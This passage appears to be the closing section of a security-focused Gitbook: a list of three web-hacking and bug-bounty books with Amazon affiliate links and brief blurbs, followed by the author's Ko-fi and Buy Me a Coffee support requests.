* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
